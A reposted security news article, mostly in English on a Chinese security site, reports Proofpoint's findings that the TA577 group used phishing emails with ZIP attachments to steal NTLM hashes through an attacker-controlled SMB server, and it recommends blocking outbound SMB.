
admin 2024年3月8日08:17:06评论10 views字数 2573阅读8分34秒阅读模式

The threat actor known as TA577 has been observed using ZIP archive attachments in phishing emails with an aim to steal NT LAN Manager (NTLM) hashes.

众所周知的威胁行为者TA577已被观察到在钓鱼邮件中使用ZIP压缩附件,目的是窃取NT LAN管理器(NTLM)哈希值。

The new attack chain "can be used for sensitive information gathering purposes and to enable follow-on activity," enterprise security firm Proofpoint said in a Monday report.


At least two campaigns taking advantage of this approach were observed on February 26 and 27, 2024, the company added. The phishing waves disseminated thousands of messages and targeted hundreds of organizations across the world.


The messages themselves appeared as responses to previous emails, a known technique called thread hijacking, in a bid to increase the likelihood of the attacks' success.


The ZIP attachments – which are the most common delivery mechanism – come with an HTML file that's designed to contact an actor-controlled Server Message Block (SMB) server.


"TA577's objective is to capture NTLMv2 Challenge/Response pairs from the SMB server to steal NTLM hashes based on characteristics of the attack chain and tools used," the company said, which could then be used for pass-the-hash (PtH) type attacks.



This means that adversaries who are in possession of a password hash do not need the underlying password to authenticate a session, ultimately enabling them to move through a network and gain unauthorized access to valuable data.


TA577, which overlaps with an activity cluster tracked by Trend Micro as Water Curupira, is one of the most sophisticated cybercrime groups. It has been linked to the distribution of malware families like QakBot and PikaBot in the past.


"The rate at which TA577 adopts and distributes new tactics, techniques, and procedures (TTPs) suggests the threat actor likely has the time, resources, and experience to rapidly iterate and test new delivery methods," Proofpoint said.


It also described the threat actor as acutely aware of the shifts in the cyber threat landscape, quickly adapting and refining its tradecraft and delivery methods to bypass detection and drop a variety of payloads. Organizations are highly recommended to block outbound SMB to prevent exploitation.





  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
  • 本文由 发表于 2024年3月8日08:17:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):


匿名网友 填写信息